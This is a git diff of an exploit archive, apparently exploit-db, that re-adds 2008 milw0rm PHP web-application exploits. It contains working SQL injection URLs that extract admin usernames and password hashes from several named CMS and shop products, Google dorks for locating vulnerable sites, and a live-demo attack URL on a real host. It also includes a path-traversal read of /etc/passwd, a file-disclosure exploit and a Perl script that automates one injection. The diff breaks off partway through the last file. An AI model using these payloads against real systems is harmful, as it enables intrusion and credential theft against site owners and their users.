+ :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS ::
+#######################################################################################################
+#######################################################################################################
+
+# milw0rm.com [2008-07-16]
diff --git a/platforms/php/webapps/6092.txt b/platforms/php/webapps/6092.txt
index 8e12a0e6f..c7104a12b 100755
--- a/platforms/php/webapps/6092.txt
+++ b/platforms/php/webapps/6092.txt
@@ -1,87 +1,87 @@
-|___________________________________________________|
-|
-| Video Share Enterprise (UID) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|---------------------Hussin X----------------------|
-|
-|    Author: Hussin X
-|
-|    Home :  www.tryag.cc/cc
-|
-|    email:  darkangel_g85[at]Yahoo[DoT]com
-|
-|
-|___________________________________________________
-|                                                   |
-|
-|
-| script : http://www.alstrasoft.com/videoshare.htm
-|
-| DorK   : Powered By AlstraSoft Video Share Enterprise
-| DorK   : inurl:"album.php?UID="
-| DorK   : inurl:"view_picture.php?viewkey="
-|___________________________________________________|
-
-Exploit:  
-
-
-www.[target].com/Script/album.php?UID=-58+UNION+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
-
-
-L!VE DEMO: :
-
-http://www.alstrahost.com/vs/album.php?UID=-58+UNION+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
-
-________________________
-table_name : column_name
-
-
- adv:adv_status
- adv:adv_text
- adv:adv_name
- adv:adv_id
- audio:embed
- audio:be_rated
- audio:be_comment
- audio:filehome
- audio:rate
- audio:ratedby
- audio:fav_num
- audio:featured
- audio:com_num
- audio:viewnumber
- audio:vkey
- audio:country
- audio:location
- audio:record_date
- audio:adddate
- audio:addtime
- audio:type
- audio:duration
- audio:duration
- audio:flvdoname
- audio:vdoname
- audio:channel
- audio:keyword
- audio:featuredesc
- audio:UID
- audio:description
- audio:VID
-
-________________________
-
-
-
-____________________________( Greetz )____________________________
-|
-| tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke
-|   
-| Iraqihack | FAHD | mos_chori | Silic0n 
-|
-|_________________________________________________________________
-
-
-                       Im IRAQi
-
-# milw0rm.com [2008-07-17]
+|___________________________________________________|
+|
+| Video Share Enterprise (UID) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|---------------------Hussin X----------------------|
+|
+|    Author: Hussin X
+|
+|    Home :  www.tryag.cc/cc
+|
+|    email:  darkangel_g85[at]Yahoo[DoT]com
+|
+|
+|___________________________________________________
+|                                                   |
+|
+|
+| script : http://www.alstrasoft.com/videoshare.htm
+|
+| DorK   : Powered By AlstraSoft Video Share Enterprise
+| DorK   : inurl:"album.php?UID="
+| DorK   : inurl:"view_picture.php?viewkey="
+|___________________________________________________|
+
+Exploit:  
+
+
+www.[target].com/Script/album.php?UID=-58+UNION+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
+
+
+L!VE DEMO: :
+
+http://www.alstrahost.com/vs/album.php?UID=-58+UNION+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
+
+________________________
+table_name : column_name
+
+
+ adv:adv_status
+ adv:adv_text
+ adv:adv_name
+ adv:adv_id
+ audio:embed
+ audio:be_rated
+ audio:be_comment
+ audio:filehome
+ audio:rate
+ audio:ratedby
+ audio:fav_num
+ audio:featured
+ audio:com_num
+ audio:viewnumber
+ audio:vkey
+ audio:country
+ audio:location
+ audio:record_date
+ audio:adddate
+ audio:addtime
+ audio:type
+ audio:duration
+ audio:duration
+ audio:flvdoname
+ audio:vdoname
+ audio:channel
+ audio:keyword
+ audio:featuredesc
+ audio:UID
+ audio:description
+ audio:VID
+
+________________________
+
+
+
+____________________________( Greetz )____________________________
+|
+| tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke
+|   
+| Iraqihack | FAHD | mos_chori | Silic0n 
+|
+|_________________________________________________________________
+
+
+                       Im IRAQi
+
+# milw0rm.com [2008-07-17]
diff --git a/platforms/php/webapps/6096.txt b/platforms/php/webapps/6096.txt
index 96a858f4a..ee2610405 100755
--- a/platforms/php/webapps/6096.txt
+++ b/platforms/php/webapps/6096.txt
@@ -1,38 +1,38 @@
-###############################################################
-#################### Viva IslaM Viva IslaM ####################
-##
-## Remote SQL injection Vulnerability
-##
-## preCMS v.1 ( index.php page )
-##                            
-###############################################################
-###############################################################
-##
-## AuTh0r : Mr.SQL
-##
-## H0ME   : WwW.PaL-HaCkEr.CoM  &  WwW.AtsDp.CoM/f
-##
-## Email  : SQL@Hotmail.it
-##
-## SYRIAN Arab HACkErS
-########################
-########################
-##
-## -[[: Exploite :]]-
-##
-## www.Target.com/index.php?page=UserProfil&id=-1'+union+select+1,2,concat_ws(0x3a3a,admin,nick,password),4,@@version+from+pre_user/*
-##
-########################
-########################
- -[[ NOTE ]]-
-1 ) Download script :  http://www.precoc.com/cms/preedit/file/0axee0401vk.rar
- 
-#######################################################################################################
-#######################################################################################################
-                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
-                                         
- :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS ::
-#######################################################################################################
-#######################################################################################################
-
-# milw0rm.com [2008-07-17]
+###############################################################
+#################### Viva IslaM Viva IslaM ####################
+##
+## Remote SQL injection Vulnerability
+##
+## preCMS v.1 ( index.php page )
+##                            
+###############################################################
+###############################################################
+##
+## AuTh0r : Mr.SQL
+##
+## H0ME   : WwW.PaL-HaCkEr.CoM  &  WwW.AtsDp.CoM/f
+##
+## Email  : SQL@Hotmail.it
+##
+## SYRIAN Arab HACkErS
+########################
+########################
+##
+## -[[: Exploite :]]-
+##
+## www.Target.com/index.php?page=UserProfil&id=-1'+union+select+1,2,concat_ws(0x3a3a,admin,nick,password),4,@@version+from+pre_user/*
+##
+########################
+########################
+ -[[ NOTE ]]-
+1 ) Download script :  http://www.precoc.com/cms/preedit/file/0axee0401vk.rar
+ 
+#######################################################################################################
+#######################################################################################################
+                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
+                                         
+ :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS ::
+#######################################################################################################
+#######################################################################################################
+
+# milw0rm.com [2008-07-17]
diff --git a/platforms/php/webapps/6097.txt b/platforms/php/webapps/6097.txt
index 06fa84f41..c2782c943 100755
--- a/platforms/php/webapps/6097.txt
+++ b/platforms/php/webapps/6097.txt
@@ -1,33 +1,33 @@
- IloveYouTryaG
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-|     _                   __           __       __          ______     |
-|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
-|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
-|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
-|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
-|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
-|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
-|                  \ \____/ >> Kings of injection                      |
-|                   \/___/                                             |
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-Title  ::   Remote SQL Injection
- 
-Author ::   QTRinu x [ Qataro (at) hotmail (dot) Com ]
-Application  ::  Arctic Issue Tracker v2.0.0
- 
-Download ::   http://www.arctictracker.com
-Price    ::  $99.95 USD
-Dork 1   ::  Powered by Arctic v2.0.0
- 
-ShoutZ   :: Allah ,InJecTor,AlQaTaRi,all InjEctOr5 TeaM ,TrYaG TeaM & Muslims Hackers
-Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.
---------------------------------------------[C o n t e x t]-----------------------------------------
- 
-Vulnerability: http:// Localhost / (Path Script) / index.php?filter= [SQL]
-
-SQL  : -1%20union%20select%201,2,3,concat(username,0x3a,password),5%20from%20arctic_user%20where%20id=1--
- 
--------------------------------------------[End of  context]----------------------------------------
-thanx str0ke/*
-
-# milw0rm.com [2008-07-17]
+ IloveYouTryaG
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+|     _                   __           __       __          ______     |
+|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
+|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
+|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
+|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
+|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
+|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
+|                  \ \____/ >> Kings of injection                      |
+|                   \/___/                                             |
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+Title  ::   Remote SQL Injection
+ 
+Author ::   QTRinu x [ Qataro (at) hotmail (dot) Com ]
+Application  ::  Arctic Issue Tracker v2.0.0
+ 
+Download ::   http://www.arctictracker.com
+Price    ::  $99.95 USD
+Dork 1   ::  Powered by Arctic v2.0.0
+ 
+ShoutZ   :: Allah ,InJecTor,AlQaTaRi,all InjEctOr5 TeaM ,TrYaG TeaM & Muslims Hackers
+Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.
+--------------------------------------------[C o n t e x t]-----------------------------------------
+ 
+Vulnerability: http:// Localhost / (Path Script) / index.php?filter= [SQL]
+
+SQL  : -1%20union%20select%201,2,3,concat(username,0x3a,password),5%20from%20arctic_user%20where%20id=1--
+ 
+-------------------------------------------[End of  context]----------------------------------------
+thanx str0ke/*
+
+# milw0rm.com [2008-07-17]
diff --git a/platforms/php/webapps/6098.txt b/platforms/php/webapps/6098.txt
index 5abf7c94b..4ac250cbf 100755
--- a/platforms/php/webapps/6098.txt
+++ b/platforms/php/webapps/6098.txt
@@ -1,39 +1,39 @@
-###############################################################
-#################### Viva IslaM Viva IslaM ####################
-##
-## Remote SQL injection Vulnerability
-##
-## Aprox CMS Engine V5.1.0.4 ( index.php page )
-##                            
-###############################################################
-###############################################################
-##
-## AuTh0r : Mr.SQL
-##
-## H0ME   : WwW.PaL-HaCkEr.CoM  &&  WwW.AtsDp.CoM/f
-##
-## Email  : SQL@Hotmail.it
-##
-## SYRIAN Arab HACkErS
-########################
-########################
-##
-## -[[: Exploite :]]-
-##
-## www.Target.com/index.php?id=-1'+UNION+SELECT+0,0,0,0,0,0,0,0,'MrSQL',0,password,login,0,0,0+FROM+aprox_users/*
-##
-########################
-########################
- -[[ NOTE ]]-
-1 ) dont use the tags in the exploite most get the info without concat()
-2 ) Download script :  http://www.aprox.de/engine/data/files/AproxEngine_V5_1_04.zip
-
-#######################################################################################################
-#######################################################################################################
-                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
-                                         
- :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS ::
-#######################################################################################################
-#######################################################################################################
-
-# milw0rm.com [2008-07-18]
+###############################################################
+#################### Viva IslaM Viva IslaM ####################
+##
+## Remote SQL injection Vulnerability
+##
+## Aprox CMS Engine V5.1.0.4 ( index.php page )
+##                            
+###############################################################
+###############################################################
+##
+## AuTh0r : Mr.SQL
+##
+## H0ME   : WwW.PaL-HaCkEr.CoM  &&  WwW.AtsDp.CoM/f
+##
+## Email  : SQL@Hotmail.it
+##
+## SYRIAN Arab HACkErS
+########################
+########################
+##
+## -[[: Exploite :]]-
+##
+## www.Target.com/index.php?id=-1'+UNION+SELECT+0,0,0,0,0,0,0,0,'MrSQL',0,password,login,0,0,0+FROM+aprox_users/*
+##
+########################
+########################
+ -[[ NOTE ]]-
+1 ) dont use the tags in the exploite most get the info without concat()
+2 ) Download script :  http://www.aprox.de/engine/data/files/AproxEngine_V5_1_04.zip
+
+#######################################################################################################
+#######################################################################################################
+                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
+                                         
+ :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS ::
+#######################################################################################################
+#######################################################################################################
+
+# milw0rm.com [2008-07-18]
diff --git a/platforms/php/webapps/6099.txt b/platforms/php/webapps/6099.txt
index 9a59643dc..d8337953c 100755
--- a/platforms/php/webapps/6099.txt
+++ b/platforms/php/webapps/6099.txt
@@ -1,34 +1,34 @@
-#################################################
-#################################################
-##SQL-Injection in Siteframe CMS (all versions)##
-#################################################
-#################################################
-
-##############
-#Author: n0ne##############
-#E-Mail: qwerty@ebanat.com#
-###########################
-
-###############################
-#Vulnerable script: folder.php#
-#Vulnerable var: id############
-####################
-
-########################################
-#CMS Homepage: http://www.siteframe.org#
-########################################
-
-##########################################################################################################################################################
-#Exploit PoC: #http://www.target.com/folder.php?id=370+and(1=2)+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user_email,user_passwd),10,11# #+from+users--#                                                                                                                                                                                           ########################################################################################################################
-##########################################################################################################################################################
-
-#########################################################################################################
-#Admin panel: http://www.target.com/admin/ (but previously you gotta log in as administrator on website)#
-#########################################################################################################
-
-###################################################
-#############Greetz to www.antichat.ru#############
-############And personally to Nilson ;)############
-###################################################
-
-# milw0rm.com [2008-07-18]
+#################################################
+#################################################
+##SQL-Injection in Siteframe CMS (all versions)##
+#################################################
+#################################################
+
+##############
+#Author: n0ne##############
+#E-Mail: qwerty@ebanat.com#
+###########################
+
+###############################
+#Vulnerable script: folder.php#
+#Vulnerable var: id############
+####################
+
+########################################
+#CMS Homepage: http://www.siteframe.org#
+########################################
+
+##########################################################################################################################################################
+#Exploit PoC: #http://www.target.com/folder.php?id=370+and(1=2)+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user_email,user_passwd),10,11# #+from+users--#                                                                                                                                                                                           ########################################################################################################################
+##########################################################################################################################################################
+
+#########################################################################################################
+#Admin panel: http://www.target.com/admin/ (but previously you gotta log in as administrator on website)#
+#########################################################################################################
+
+###################################################
+#############Greetz to www.antichat.ru#############
+############And personally to Nilson ;)############
+###################################################
+
+# milw0rm.com [2008-07-18]
diff --git a/platforms/php/webapps/6102.txt b/platforms/php/webapps/6102.txt
index 0b1a52069..577c490cb 100755
--- a/platforms/php/webapps/6102.txt
+++ b/platforms/php/webapps/6102.txt
@@ -1,39 +1,39 @@
-###############################################################
-#################### Viva IslaM Viva IslaM ####################
-##
-## Remote SQL injection Vulnerability
-##
-## PHPFootball 1.6 ( show.php dbtable )
-##                            
-###############################################################
-###############################################################
-##
-## AuTh0r : Mr.SQL
-##
-## H0ME   : WwW.PaL-HaCkEr.CoM  &&  WwW.AtsDp.CoM/f
-##
-## Email  : SQL@Hotmail.it
-##
-## SYRIAN Arab HACkErS
-########################
-########################
-##
-## -[[: Exploite :]]-
-##
-## www.Target.com/show.php?dbtable=Predictions+UNION+SELECT+0,Concat_Ws(0x3a,Username,Password)MrSQL,0,0,0+FROM+Accounts--
-##
-########################
-########################
- -[: N0TE :]-
-1) Download script ;D  http://garr.dl.sourceforge.net/sourceforge/phpfootball/PHPfootball1.6.zip
-2) Passwords Md5
- 
-#######################################################################################################
-#######################################################################################################
-                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
-                                         
- :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS ::
-#######################################################################################################
-#######################################################################################################
-
-# milw0rm.com [2008-07-20]
+###############################################################
+#################### Viva IslaM Viva IslaM ####################
+##
+## Remote SQL injection Vulnerability
+##
+## PHPFootball 1.6 ( show.php dbtable )
+##                            
+###############################################################
+###############################################################
+##
+## AuTh0r : Mr.SQL
+##
+## H0ME   : WwW.PaL-HaCkEr.CoM  &&  WwW.AtsDp.CoM/f
+##
+## Email  : SQL@Hotmail.it
+##
+## SYRIAN Arab HACkErS
+########################
+########################
+##
+## -[[: Exploite :]]-
+##
+## www.Target.com/show.php?dbtable=Predictions+UNION+SELECT+0,Concat_Ws(0x3a,Username,Password)MrSQL,0,0,0+FROM+Accounts--
+##
+########################
+########################
+ -[: N0TE :]-
+1) Download script ;D  http://garr.dl.sourceforge.net/sourceforge/phpfootball/PHPfootball1.6.zip
+2) Passwords Md5
+ 
+#######################################################################################################
+#######################################################################################################
+                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
+                                         
+ :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS ::
+#######################################################################################################
+#######################################################################################################
+
+# milw0rm.com [2008-07-20]
diff --git a/platforms/php/webapps/6107.txt b/platforms/php/webapps/6107.txt
index 474a143da..aa60ba911 100755
--- a/platforms/php/webapps/6107.txt
+++ b/platforms/php/webapps/6107.txt
@@ -1,65 +1,65 @@
-Digital Security Research Group [DSecRG] Advisory       #DSECRG-08-31
-
-
-Application:                    Interact E-Learning System
-Versions Affected:              2.4.1
-Vendor URL:                     http://sourceforge.net/projects/cce-interact
-Bug:                            Local File Include
-Exploits:                       YES
-Reported:                       03.07.2008
-Vendor response:                04.07.2008
-Solution:                       YES
-Date of Public Advisory:        21.07.2008
-Authors:                        Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)
-
-
-
-Description
-***********
-
-Interact E-Learning System system has local file include vulnerability in script help/help.php
-
-Vulnerable GET parameters "module", "file".
-
-Code
-****
-#################################################
-
-$module = isset($_GET['module']) ? $_GET['module']:'';
-$file   = isset($_GET['file']) ? $_GET['file']:'';
-
-...
-
-$hpath=$CONFIG['BASE_PATH'].'/language/'.$_SESSION['language'].'/help/'.$module.'/'.$file;
-if (is_file($hpath)){
-        require_once($hpath);
-} else {
-        require_once($CONFIG['BASE_PATH'].'/language/default/help/'.$module.'/'.$file);
-}
-
-#################################################
-
-Example:
-
-http://[server]/[installdir]/help/help.php?module=../../../../../../../../../../../../../etc/passwd%00
-http://[server]/[installdir]/help/help.php?file=../../../../../../../../../../../../../etc/passwd
-
-
-
-Solution
-********
-
-This file is no longer required by the system. Remove it from installation.
-
-Vendor response:
-
-"I have posted an alert to users to remove this from their installations asap and will get it removed from the next release of the package."
-
-
-
-About
-*****
-
-Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.
-
-# milw0rm.com [2008-07-21]
+Digital Security Research Group [DSecRG] Advisory       #DSECRG-08-31
+
+
+Application:                    Interact E-Learning System
+Versions Affected:              2.4.1
+Vendor URL:                     http://sourceforge.net/projects/cce-interact
+Bug:                            Local File Include
+Exploits:                       YES
+Reported:                       03.07.2008
+Vendor response:                04.07.2008
+Solution:                       YES
+Date of Public Advisory:        21.07.2008
+Authors:                        Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)
+
+
+
+Description
+***********
+
+Interact E-Learning System system has local file include vulnerability in script help/help.php
+
+Vulnerable GET parameters "module", "file".
+
+Code
+****
+#################################################
+
+$module = isset($_GET['module']) ? $_GET['module']:'';
+$file   = isset($_GET['file']) ? $_GET['file']:'';
+
+...
+
+$hpath=$CONFIG['BASE_PATH'].'/language/'.$_SESSION['language'].'/help/'.$module.'/'.$file;
+if (is_file($hpath)){
+        require_once($hpath);
+} else {
+        require_once($CONFIG['BASE_PATH'].'/language/default/help/'.$module.'/'.$file);
+}
+
+#################################################
+
+Example:
+
+http://[server]/[installdir]/help/help.php?module=../../../../../../../../../../../../../etc/passwd%00
+http://[server]/[installdir]/help/help.php?file=../../../../../../../../../../../../../etc/passwd
+
+
+
+Solution
+********
+
+This file is no longer required by the system. Remove it from installation.
+
+Vendor response:
+
+"I have posted an alert to users to remove this from their installations asap and will get it removed from the next release of the package."
+
+
+
+About
+*****
+
+Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.
+
+# milw0rm.com [2008-07-21]
diff --git a/platforms/php/webapps/6112.txt b/platforms/php/webapps/6112.txt
index baa4070d8..aeedb40ce 100755
--- a/platforms/php/webapps/6112.txt
+++ b/platforms/php/webapps/6112.txt
@@ -1,28 +1,28 @@
-##################################################################################################
- EZWebAlbum (dlfilename) Remote File Disclosure Vulnerability     |,  .-.  .-.  ,|
- Found by : Ghost Hacker [ R-H TeaM ]                             | )(_o/  \o_)( |
- My Site web : Real-hack.Net                                      |/     /\     \|
-##################################################################################################
-[~] Found by : Ghost Hacker [ R-H TeaM ]
-[~] Home page : www.Real-hack.net
-[~] Email : Ghost-r00t@Hotmail.com
-[~] Name Script : EZWebAlbum
-[~] Download Script : http://sourceforge.net/projects/ezwebalbum
-###################################### [ Viva IslaM & KSA ] ######################################
-[~] Error (download.php) :
-readfile($dlfilename);
-
-[~] Exploit :
-http://xxxx/[path]/download.php?dlfilename=EVIL
-[~] Example :
-http://xxxx/[path]/download.php?dlfilename=index.php
-###################################### [ Viva IslaM & KSA ] ######################################
-[~] Greetz :
-PROTO & QaTaR BoeZ TeaM & Aseg-Rabe7 & Dmar al3noOoz & 4Bo3tB & LeGeNd HaCkEr & Root Hacker ..
-Qptan & ScarY.HaCkEr & EgYpTiaNxHaCkEr the-pirate.org & Mr.hope & My Blog[ gh0st10.wordpress.com ]
-All Members Real Hack And All My Friends ..
-##################################################################################################
- Found by : Ghost Hacker [ R-H TeaM ]
-##################################################################################################
-
-# milw0rm.com [2008-07-21]
+##################################################################################################
+ EZWebAlbum (dlfilename) Remote File Disclosure Vulnerability     |,  .-.  .-.  ,|
+ Found by : Ghost Hacker [ R-H TeaM ]                             | )(_o/  \o_)( |
+ My Site web : Real-hack.Net                                      |/     /\     \|
+##################################################################################################
+[~] Found by : Ghost Hacker [ R-H TeaM ]
+[~] Home page : www.Real-hack.net
+[~] Email : Ghost-r00t@Hotmail.com
+[~] Name Script : EZWebAlbum
+[~] Download Script : http://sourceforge.net/projects/ezwebalbum
+###################################### [ Viva IslaM & KSA ] ######################################
+[~] Error (download.php) :
+readfile($dlfilename);
+
+[~] Exploit :
+http://xxxx/[path]/download.php?dlfilename=EVIL
+[~] Example :
+http://xxxx/[path]/download.php?dlfilename=index.php
+###################################### [ Viva IslaM & KSA ] ######################################
+[~] Greetz :
+PROTO & QaTaR BoeZ TeaM & Aseg-Rabe7 & Dmar al3noOoz & 4Bo3tB & LeGeNd HaCkEr & Root Hacker ..
+Qptan & ScarY.HaCkEr & EgYpTiaNxHaCkEr the-pirate.org & Mr.hope & My Blog[ gh0st10.wordpress.com ]
+All Members Real Hack And All My Friends ..
+##################################################################################################
+ Found by : Ghost Hacker [ R-H TeaM ]
+##################################################################################################
+
+# milw0rm.com [2008-07-21]
diff --git a/platforms/php/webapps/6113.pl b/platforms/php/webapps/6113.pl
index 8d1ae2747..fd1fb30f3 100755
--- a/platforms/php/webapps/6113.pl
+++ b/platforms/php/webapps/6113.pl
@@ -1,87 +1,87 @@
-#!/usr/bin/perl
- 
-use IO::Socket;
- 
-
-print q{
------------------------------------------------
-Arctic Issue Tracker v2.0.0 exploit by ldma
-              ~ SubCode ~
-use: arctic.pl [server] [dir]
-sample:
-$perl arctic.pl localhost /arctic/
------------------------------------------------
- 
-};
- 
-$webpage = $ARGV[0];
-$directory = $ARGV[1];
-print "+-initiating\n";
-print "|--modules..OK!\n";
-        sleep 1;
-print "|--premodules..OK!\n";
-        sleep 1;
-print "|--preprocessors..OK!\n";
-        sleep 1;
-print "+-opening channel.. OK!\n";
-        sleep 2;
-print "--------------------------------------------\n";
-print "~ configuration complete.. OK!\n";
-print "~ scanning";
-$|=1;
-foreach (1..2) {
-        print ".";
-        sleep 1;
-        }
-print " OK!\n";
-if (!$webpage) { die "\+ rtfm geek\n"; }
- 
-$wbb_dir =
-"http://".$webpage.$directory."index.php?filter=-1%20union%20select%201,2,3,concat(username,0x3a,password),5%20from%20arctic_user%20where%20id=1--";
- 
-print "~ connecting";
-$|=1;
-foreach (1..1) {
-        print ".";
-        sleep 1;
-        }
-print " OK!\n";
-$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", PeerPort=>"80") || die "[+] Can't connect to Server\n";
- 
-print "~ open exploiting-tree";
-$|=1;
-foreach (1..2) {
-        print ".";
-        sleep 1;
-        }
-print " OK!\n";
-print $sock "GET $wbb_dir HTTP/1.1\n";
-print $sock "Accept: */*\n";
-print $sock "User-Agent: Hacker\n";
-print $sock "Host: $webpage\n";
-print $sock "Connection: close\n\n";
-print "[+] Target: $webpage\n";
-while ($answer = <$sock>) {
-if ($answer =~ /Current Filter: (.*)<\/strong>/) {
-print "exploiting in progress";
-$|=1;
-foreach (1..3) {
-        print "...";
-        sleep 1;
-        }
- 
- 
-print "OK!\n[+] vuln: OK!\n\n\nwell done, ldma!\n\n";
-print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
-print "[+] USER-ID: -1\n";
-print "[+] ID-HASH: $1\n";
-print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
-exit();
-}
-}
- 
-close($sock);
- 
-# ldma[2008-07-19] 
-
-# milw0rm.com [2008-07-21]
+#!/usr/bin/perl
+ 
+use IO::Socket;
+ 
+
+print q{
+-----------------------------------------------
+Arctic Issue Tracker v2.0.0 exploit by ldma
+              ~ SubCode ~
+use: arctic.pl [server] [dir]
+sample:
+$perl arctic.pl localhost /arctic/
+-----------------------------------------------
+ 
+};
+ 
+$webpage = $ARGV[0];
+$directory = $ARGV[1];
+print "+-initiating\n";
+print "|--modules..OK!\n";
+        sleep 1;
+print "|--premodules..OK!\n";
+        sleep 1;
+print "|--preprocessors..OK!\n";
+        sleep 1;
+print "+-opening channel.. OK!\n";
+        sleep 2;
+print "--------------------------------------------\n";
+print "~ configuration complete.. OK!\n";
+print "~ scanning";
+$|=1;
+foreach (1..2) {
+        print ".";
+        sleep 1;
+        }
+print " OK!\n";
+if (!$webpage) { die "\+ rtfm geek\n"; }
+ 
+$wbb_dir =
+"http://".$webpage.$directory."index.php?filter=-1%20union%20select%201,2,3,concat(username,0x3a,password),5%20from%20arctic_user%20where%20id=1--";
+ 
+print "~ connecting";
+$|=1;
+foreach (1..1) {
+        print ".";
+        sleep 1;
+        }
+print " OK!\n";
+$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", PeerPort=>"80") || die "[+] Can't connect to Server\n";
+ 
+print "~ open exploiting-tree";
+$|=1;
+foreach (1..2) {
+        print ".";
+        sleep 1;
+        }
+print " OK!\n";
+print $sock "GET $wbb_dir HTTP/1.1\n";
+print $sock "Accept: */*\n";
+print $sock "User-Agent: Hacker\n";
+print $sock "Host: $webpage\n";
+print $sock "Connection: close\n\n";
+print "[+] Target: $webpage\n";
+while ($answer = <$sock>) {
+if ($answer =~ /Current Filter: (.*)<\/strong>/) {
+print "exploiting in progress";
+$|=1;
+foreach (1..3) {
+        print "...";
+        sleep 1;
+        }
+ 
+ 
+print "OK!\n[+] vuln: OK!\n\n\nwell done, ldma!\n\n";
+print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
+print "[+] USER-ID: -1\n";
+print "[+] ID-HASH: $1\n";
+print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
+exit();
+}
+}
+ 
+close($sock);
+ 
+# ldma[2008-07-19] 
+
+# milw0rm.com [2008-07-21]
diff --git a/platforms/php/webapps/6114.txt b/platforms/php/webapps/6114.txt
index 018aa652f..742c259ee 100755
--- a/platforms/php/webapps/6114.txt
+++ b/platforms/php/webapps/6114.txt
@@ -1,16 +1,16 @@
-ShopcartDX Remote Sql Injection All Version
-
-By Cr@zy_King / sqL Lov3r'Z Crew Co. 2008
-
-Downlod: http://webscripts.softpedia.com/script/E-Commerce/Shopping-Carts/ShopcartDX-1-1421.html
-
-Sql :
-
-http://localhost/patch/product_detail.php?cid=9&pid=-1 UNION SELECT 1,2,3,4,database(),6,7,8,9,10,11,12,13,14,15,16/*
-
-Greatz : aLL My Friend'Z and str0ke
-
-
-========================================From Turkey============================================= 
-
-# milw0rm.com [2008-07-21]
+ShopcartDX Remote Sql Injection All Version
+
+By Cr@zy_King / sqL Lov3r'Z Crew Co. 2008
+
+Downlod: http://webscripts.softpedia.com/script/E-Commerce/Shopping-Carts/ShopcartDX-1-1421.html
+
+Sql :
+
